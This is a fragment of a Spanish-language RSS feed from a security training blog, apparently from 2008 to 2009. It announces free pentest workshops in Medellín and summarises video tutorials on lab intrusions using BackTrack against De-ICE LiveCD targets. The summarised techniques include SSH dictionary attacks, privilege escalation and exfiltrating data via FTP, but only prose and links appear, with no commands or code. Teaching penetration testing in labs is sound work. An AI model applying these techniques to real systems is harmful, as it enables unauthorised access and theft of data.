- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Acceso a la Información Interna</a></p>
<p style="text-align: justify;"><strong>Fecha:</strong> Sabado 21 de Febrero de 2008<br />
<strong>Hora:</strong> 2:00 pm<br />
<strong>Lugar:</strong> Tecnosoft &#8211; Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10<br />
<strong>Cupos limitados:</strong> +/- 15 personas</p>
<p style="text-align: justify;"><strong>Repito:</strong> Solo pueden asistir las personas que confirmen asistencia (el proceso de confirmación consiste en que me envía la solicitud y yo le confirmo por e-mail la reserva de su cupo), Lo hago de esta manera para garantizar de que todos estén comodos y no tengan que ocupar un equipo por dos personas, o peor aún que vaya y no tenga reserva de cupo.<br />
Aclaro también y pongo a disposición sobre quienes tengan laptops personales y quieran llevarlo allá le hago el espacio y aprende con todos.<br />
Les recuerdo nuevamente que estos HackLabs no tienen ningún costo.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-08-medellin-pentest-repeticion/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Video Tutorial de Instalación de BackTrack 4 Beta</title>
		<link>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-4-beta</link>
		<comments>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-4-beta#comments</comments>
		<pubDate>Fri, 13 Feb 2009 21:45:28 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Recursos / Libros / Documentos]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=578</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>El siguiente video tutorial muestra el proceso necesario para llevar a cabo la instalación de la nueva versión de BackTrack en su fase beta en el disco duro de una PC.</p>
<p><strong><a href="http://www.4shared.com/file/87539628/15bd95a5/Instalacin_BackTrack_4_Beta_LabsDragonJARorg.html">Descargar video tutorial de instalación de BackTrack 4 Beta en el disco duro</a></strong> (<strong>Password:</strong> www.dragonjar.org)</p>
<p>Recuerda estudiar los diferentes recursos publicados relacionados con la distribución <strong><a href="http://labs.dragonjar.org/category/backtrack">BackTrack</a></strong> y los Test de Penetración.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-4-beta/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>HackTaller 07 Medellín &#8211; PenTest</title>
		<link>http://labs.dragonjar.org/hacktaller-07-medellin-pentest</link>
		<comments>http://labs.dragonjar.org/hacktaller-07-medellin-pentest#comments</comments>
		<pubDate>Thu, 12 Feb 2009 19:09:48 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=560</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Extiendo la invitación a todos los interesados en participar de este 7° HackTaller a desarrollarse en la ciudad de Medellín.</p>
<p>La temática para este HackLab será nuevamente Test de Penetración, pero está vez profundizando aún más en la dificultad del entorno de pruebas.</p>
<p>El escenario propuesto para este Test de Penetración es el siguiente:</p>
<p>Una compañía te contrata para identificar las vulnerabilidades que se encuentran en una de las redes (192.168.2.xxx). Los hosts dentro de la red no son sistemas críticos y además recientemente se han hecho copias de seguridad que además han sido verificadas, por lo tanto no hay problema sobre cualquier daño que pueda ocurrir. La organización ha tenido multiples administradores encargados de la red en los últimos dos años, y estan inseguros de las capacidades del anterior (o actual) personal.</p>
<p>Nuevamente se harán algunas definiciones necesarias y relacionadas en lo que yo llamo el arte de los Test de Penetración, para realizar de manera guiada el mismo.</p>
<p>El proceso de inscripción será igual a los anteriores. Los interesados deben enviarme un correo electrónico solicitando un cupo para el hacklab, el proceso de inscripción se completa, luego de que yo responda este e-mail confirmandole la disponiblidad del espacio.</p>
<p><strong>4v4t4r @ gmail . com</strong></p>
<p>Todos las personas que alcancen a tener un cupo deben llevar algunos materiales indispensables para el Test de Penetración.</p>
<p>- Imágen de BackTrack 3 para máquina virtual. Este archivo puede ser descargado de manera directa desde el siguiente enlace. (<a href="http://174.36.1.2/bt3.7z">Descargar imágen de máquina virtual BackTrack 3</a>)<br />
- Dispositivo de almacenamiento (preferiblemente superior a 2 gigas)<br />
- Cuaderno de notas<br />
- Comida para el profesor (papitas, chitos, gudis, rondallas, trocitos, café, etc, etc&#8230;)<br />
- Muy buena disposición de aprendizaje y enseñanza (pues la idea es retroalimentarnos con experiencias propias)<br />
- Desarrollar y/o visualizar los laboratorios realizados sobre Test de Penetración. Es muy necesario que vean y comprendan sobre los temas que ya se han tratado, pongo a continuación los videos de los trabajos realizados:</p>
<p>- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración 1</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los ambientes virtuales de intrusión en Windows</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los Ambientes Virtuales de Intrusión en Linux</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-escaneo-e-identificacion-del-sistema">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Escaneo e identificación del Sistema</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; System Hacking</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Acceso a la Información Interna</a></p>
<p><strong>Fecha:</strong> Sabado 14 de Fecbrero de 2008<br />
<strong>Hora:</strong> 2:00 pm<br />
<strong>Lugar:</strong> Tecnosoft &#8211; Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10<br />
<strong>Cupos limitados:</strong> +/- 15 personas</p>
<p><strong>Repito:</strong> Solo pueden asistir las personas que confirmen asistencia (el proceso de confirmación consiste en que me envía la solicitud y yo le confirmo por e-mail la reserva de su cupo), Lo hago de esta manera para garantizar de que todos estén comodos y no tengan que ocupar un equipo por dos personas, o peor aún que vaya y no tenga reserva de cupo.<br />
Aclaro también y pongo a disposición sobre quienes tengan laptops personales y quieran llevarlo allá le hago el espacio y aprende con todos.<br />
Les recuerdo nuevamente que estos HackLabs no tienen ningún costo&#8230; ya el que me quiera llevar cositas no me enojo XD.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-07-medellin-pentest/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Acceso a la Información Interna</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna#comments</comments>
		<pubDate>Tue, 20 Jan 2009 20:03:55 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[OpenSSL]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=528</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Luego de haber conseguido los diferentes datos de inicio de sesión de los usuarios en el sistema, procederemos a analizar y acceder la información crítica del sistema objetivo. Esto es necesario como PenTesters, pues vuelvo y repito, la finalidad de cada Test de Penetración es demostrar que tan vulnerable es el sistema, y que tan expuesto puede estar frente a los ataques de los delincuentes informáticos.</p>
<div align="center"><img alt="" src="http://img407.imageshack.us/img407/1382/openssldp4.jpg" title="OpenSSL" class="aligncenter" width="400" height="348" /></div>
<p>En el siguiente video tutorial veremos como accedemos al sistemas con los datos obtenidos, veremos además como recolectamos la información sensible del mismo, como la podemos descifrar y como modificamos el archivo de configuración del servidor FTP para transferir los datos.<br />
<span id="more-528"></span><br />
Con esta sesión damos por terminado el &#8220;resumen&#8221; de los laboratorios 5 y 6 realizados en la ciudad de Medellín, y al Laboratorio Virtual relizado en el pasado mes de diciembre. Solo bastará otro post a modo de conclusiones sobre el mismo y la invitación a que participen en los próximos <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><embed src="http://blip.tv/play/Ae3kDpSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><strong><a href="http://www.4shared.com/file/81634127/976301f8/PenTest5_LabsDragonJARorg.html ">Descargar video tutorial Test de Penetración &#8211; Acceso a la Información sensible</a></strong> (<strong>Password: </strong>www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; System Hacking</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking#comments</comments>
		<pubDate>Sun, 18 Jan 2009 19:24:05 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Entorno Virtualizado de Intrusión]]></category>
		<category><![CDATA[John The Ripper]]></category>
		<category><![CDATA[Laboratorio de seguridad informática]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Passwords]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Shadow]]></category>
		<category><![CDATA[SSH]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[virtualización]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=525</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Una vez recolectada toda la información del sistema (servicios, versiones, S.O, etc) y luego de haber realizado algunos intentos de conexión sobre ellos podemos perfilar algunos puntos de intrusión en el Sistema.</p>
<div align="center"><img alt="" src="http://img147.imageshack.us/img147/8812/xhydrazg7.jpg" title="Xhydra-PenTest" class="aligncenter" width="400" height="394" /></div>
<p>Sin lugar a dudas el servicio de SSHD &#8211; Secure Shell Daemon es el más opcionado para ser nuestro primer objetivo.<br />
<span id="more-525"></span><br />
En el siguiente video tutorial veremos como recolectamos información sensible de la compañía desde la propia página Web, además como hacemos uso de esa misma información para llevar a cabo un ataque basado en diccionario al servicio SSH.<br />
Luego veremos como con base a la información y la interacción con el sistema se hace necesario escalar privilegios en el mismo. Todo esto y más en el video tutorial.</p>
<p><embed src="http://blip.tv/play/Ae3kSJSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><strong><a href="http://www.4shared.com/file/81287772/6007a169/PenTest4_LabsDragonJARorg.html">Descargar video tutorial de Test de Penetración &#8211; System Hacking</a></strong> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los Ambientes Virtuales de Intrusión en Linux</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux#comments</comments>
		<pubDate>Thu, 15 Jan 2009 22:11:38 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Entorno Virtualizado de Intrusión]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[virtualización]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=519</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Al igual que la sesión anterior, esta muestra como llevar a cabo el proceso de configuración del entorno virtualizado de intrusión bajo Linux y VMWare WorkStation.</p>
<p>En el siguiente video tutorial veremos como crear una nueva maquina virtual en VMWare WorkStation, como confirgurarla para que trabaje como el entorno virtualizado de intrusión objeto de estudio de estos Laboratorios Virtuales y como acceder a las intrucciones de desarrollo del mismo, utilizando como cliente BackTrack.</p>
<p><embed src="http://blip.tv/play/Ae3iAZSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><strong><a href="http://www.4shared.com/file/80821521/efcabf57/config_labVirtualLinux_LabsDragonJARorg.html ">Descargar video tutorial de configuración del entorno virtualizado de intrusión en Linux</a></strong> (<strong>Password:</strong> www.dragonjar.org) &#8211; <strong>formato del video:</strong> .ogg</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los ambientes virtuales de intrusión</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion#comments</comments>
		<pubDate>Wed, 14 Jan 2009 22:48:08 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[virtualización]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=510</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Una vez concluída la introducción y luego de dejar claro algunos conceptos podemos comenzar con la configuración de los ambientes virtuales de intrusión.</p>
<div align="center"><img alt="" src="http://img413.imageshack.us/img413/529/penetrationmb0.jpg" title="PenTesting" class="aligncenter" width="450" height="300" /></div>
<p>En el siguiente video tutorial profundizo un poco más sobre el proyecto de LiveCD&#8217;s como herramientas de prácticas de Test de Intrusión; Desarrollo original de Thomas Wilhem (<strong><a href="http://heorot.net/livecds/">De-ICE.net PenTest LiveCDs Project</a></strong>).<br />
Además muestro el proceso de configuración y ejecución de los entornos virtuales de intrusión sobre VMWare WorkStation y Qemu.</p>
<p>En los próximos video tutoriales mostraré como llevar a cabo el montaje de estos entornos bajo ambientes Linux y el desarrollo del propio Test de Penetración desde BackTrack.</p>
<p><embed src="http://blip.tv/play/Ae3hRZSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><strong><a href="http://www.4shared.com/file/80657868/57e3b318/Pentest2_LabsDragonJARorg.html ">Descargar video tutorial de configuración de los ambientes virtuales de intrusión</a></strong> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración 1</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1#comments</comments>
		<pubDate>Wed, 14 Jan 2009 08:40:43 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Entorno Virtualizado de Intrusión]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=494</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>El siguiente video tutorial hace la introducción y resumen de los laboratorios realizados en modo presencial y virtual referentes a Test de Penetración, Hacking: Técnicas y Contramedidas, Web Application PenTest e Informática Forense.</p>
<p align="center"><img alt="" src="http://img299.imageshack.us/img299/2074/pentestlu0.jpg" title="PenTest" class="aligncenter" width="450" height="332" /></p>
<p>La presentación no busca recrear por completo los temas tratados en cada uno de estos laboratorios, en lugar de ello presenta los apartes más importantes de los mismos, tratando de profundizar mucho más en los aspectos prácticos y técnicos.</p>
<p><span id="more-494"></span></p>
<p>Se hace necesario aclarar que en este video tutorial se presentan algunos conceptos a manera muy general, sin llegar al detalle como se ha hecho en cada una de las sesiones presenciales y virtuales, pues este solo busca nivelar y resumir sobre las sesiones realizadas a las personas que por diferentes razones no han podido estar presentes en estos, además de invitar a la comunidad e interesados a participar en los próximos.</p>
<p>La siguiente es la agenda a cubrir en la sesión:</p>
<p>- ¿Quiénes somos?<br />
- Conceptos básicos sobre Seguridad Informática / Test de Penetración<br />
- Estado actual de los Laboratorios de Seguridad Informática<br />
- ¿Qué son los Laboratorios de Seguridad Informática Labs.DragonJAR.org?<br />
- Laboratorios realizados<br />
- Objetivo del Laboratorio<br />
- Contenido del Laboratorio<br />
- Materiales necesarios para desarrollar el Laboratorio<br />
- Desarrollo del Laboratorio<br />
- Conclusiones</p>
<p>Este video tutorial llega hasta la presentación y resumen de los laboratorios realizados hasta la fecha, definición de aspectos básicos la seguridad de la información/Test de Penetración e introducción en el ambiente virtualizado a desarrollar.</p>
<p>En los próximos veremos como podemos llevar a cabo el proceso de configuración y desarrollo del Test de Penetración.</p>
<p><embed src="http://blip.tv/play/Ae3dKZSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><a href="http://www.4shared.com/file/80554284/59608a2b/PenTest1_LabsDragonJARorg.html">Descargar video tutorial de presentación e introducción en el Laboratorio de Test de Penetración</a></strong> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1/feed</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Laboratorio Virtual: Test de Penetración 1 (Introducción y Desarrollo)</title>
		<link>http://labs.dragonjar.org/laboratorio-virtual-test-de-penetracion-1-introduccion-y-desarrollo</link>
		<comments>http://labs.dragonjar.org/laboratorio-virtual-test-de-penetracion-1-introduccion-y-desarrollo#comments</comments>
		<pubDate>Thu, 18 Dec 2008 20:38:43 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Entorno Virtualizado de Intrusión]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=488</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">&#8220;Hace días venía madurando la posibilidad de ofrecer los mismos laboratorios que vengo desarrollando en la ciudad de Medellín pero en modo virtual:<br />
<a href="http://anonym-url.com/go.php?to=http://labs.dragonjar.org/desarrollo-del-laboratorio-de-informatica-forense-en-medellin" target="_blank"><strong>Desarrollo del Laboratorio de Informática Forense en Medellín</strong></a><br />
<a href="http://anonym-url.com/go.php?to=http://labs.dragonjar.org/desarrollo-del-hacktaller-05-medellin-fotografias" target="_blank"><strong>Desarrollo del HackTaller 05 Medellín &#8211; Fotografías</strong></a><br />
<a href="http://anonym-url.com/go.php?to=http://labs.dragonjar.org/desarrollo-del-hacktaller-06-en-medellin-fotografias-y-escenario-propuesto" target="_blank"><strong>Desarrollo del HackTaller 06 en Medellín &#8211; Fotografías y Escenario propuesto</strong></a>&#8221;</p>
<p style="text-align: justify;">Este será llevado a cabo el próximo sabado 20 de diciembre &#8211; 2:00 PM To 4:00 PM (GMT-05:00) Eastern Time (US &amp; Canada)</p>
<p>Los interesados deben enviarme un correo electrónico, al cual yo responderé con el enlace al salón virtual.</p>
<p>4v4t4r @ gmail . com</p>
<p style="text-align: justify;"><span id="more-488"></span>La temática para este primer laboratorio virtual es la siguiente:</p>
<p><strong>Test de Penetración 1 (Introducción y Desarrollo)</strong></p>
<p>La finalidad de este primer Laboratorio virtual de Test de Penetración, será el ofrecer las técnicas, procesos y procedimientos necesarios para llevar a cabo un Test de Penetración haciendo uso de la Multi-Herramienta BackTrack.</p>
<p>Esto conllevará entonces a aprender y prácticar con ejemplos claros, sobre el uso de esta máginifica distribución. Además de las metodologías necesarias en un Test de Penetración.</p>
<p><strong>Escenario propuesto:</strong></p>
<p>El escenario para este Laboratorio es el de un CEO de una pequeña empresa que ha sido presionado por el Comité Administrativo para ser objeto de un Test de Penetración a realizarse desde la empresa. El Director General afirma que su empresa es segura, cree además de que este Test de Penetración será un enorme desperdicio de dinero, sobre todo porque ya tiene una solución de exploración (escaneo) de vulnerabilidades (Nessus). Para hacer “felices” a los del Comité Administrativo, él decide contratarlo a usted y le dá un plazo de 5 días para realizar el trabajo, pues como se mencionó él no cree que la empresa sea vulnerable a cualquier intento de acceso no autorizado.<br />
Su tarea es analizar solo un servidor en el cual se aloja una página Web que ofrece información de contacto de la misma.</p>
<p>El Director General espera que usted intente con todos los tipos de ataques que estén a su disposición, pues está seguro de que usted no podrá vulnerar el sistema y obtener acceso.<br />
Demostrar que el sistema es vulnerable sería la mejor manera de concientizar al Director General, para desde allí implementar mejores prácticas en materia de seguridad Informática.<br />
&#8212;&#8212;&#8212;-</p>
<p>De esta manera hago la invitación a todos los interesados en participar. No existe entonces la limitación geográfica que muchos usuarios presentan <img src="http://comunidad.dragonjar.org/Smileys/default/smiley.gif" border="0" alt="Sonrisa" />.</p>
<p style="text-align: justify;">Por ahora y como vieron en la descripción se hace necesario tener la distribución BackTrack.</p>
<p>La idea entonces es que descarguen la imágen y la configuren en una máquina virtual (VMWare Player / WorkStation / Server).<br />
Como sugerencia personal preferiría que descargaran la siguiente máquina virtual ya creada, con las vmware tools instaladas y lista para ser usada.</p>
<p><a href="http://anonym-url.com/go.php?to=http://174.36.1.2/bt3.7z" target="_blank"><strong>Descargar Máquina Virtual BackTrack 3</strong></a> (Desarrollada por <a href="http://anonym-url.com/go.php?to=http://bagside.com/bagvapp/index.html" target="_blank"><strong>Bagside</strong></a>)</p>
<p style="text-align: justify;">Ahora publico el sistema que será objeto del Test de Penetración.</p>
<p><a href="http://anonym-url.com/go.php?to=http://www.sendspace.com/file/hglz1o" target="_blank"><strong>Descargar imágen de Entorno Virtualizado de Intrusion +/- 195Mb</strong></a></p>
<p>La idea es que vayan leyendo los enlaces que publiqué anteriormente, además pueden ir descomprimiendo la máquina virtual BackTrack (+/- 1.5Gb).<br />
Recuerden además que este laboratorio será desarrollado en cualquiera de los productos VMWare (WorkStation, Player, Server), aunque de todas maneras mostraré como puede configurarse en Qemu. Así que por lo tanto deben tener instalado cualquiera de esos productos (preferiblemente VMWare WorkStation).</p>
<p>El laboratorio promete, así que espero no se lo pierdan, mucho menos las personas de otras ciudades y paises que han querido participar en los Hack Labs que realizo en mi ciudad.</p>
<p>Para ese día deben tener un buen sistema de sonido (ej. diadema o audífonos, para poder recepcionar bien el audio).<br />
Espero además que tengan una buena conexión a internet, pues algunos recursos así lo requieren.</p>
<p>Aún sigo esperando los correos electrónicos de las personas que estén interesadas, hasta el momento solo he recibido 8 correos, y solo puede ser transmitida la invitación por ese medio.<br />
De la buena asistencia depende de que continúe o no con la realización y publicación de los mismos <img src="http://comunidad.dragonjar.org/Smileys/default/wink.gif" border="0" alt="Gi&amp;ntilde;ar" /></p>
<p><strong>Textos e información de interés:</strong></p>
<p><a href="../descubrimiento-de-aplicaciones-nmap" target="_blank">http://labs.dragonjar.org/descubrimiento-de-aplicaciones-nmap</a><br />
<a href="../video-tutorial-de-instalacion-de-backtrack-3" target="_blank">http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-3</a><br />
<a href="../test-de-penetracion-con-backtrack-netcat" target="_blank">http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat</a><br />
<a href="../test-de-penetracion-con-backtrack-servicios-basicos" target="_blank">http://labs.dragonjar.org/test-de-penetracion-con-backtrack-servicios-basicos</a><br />
<a href="../test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank">http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-i" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-i</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-ii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-ii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-enumeracion-del-objetivo-ii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-enumeracion-del-objetivo-ii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-i</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-ii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-ii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-iii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-iii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-iii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-iii</a><br />
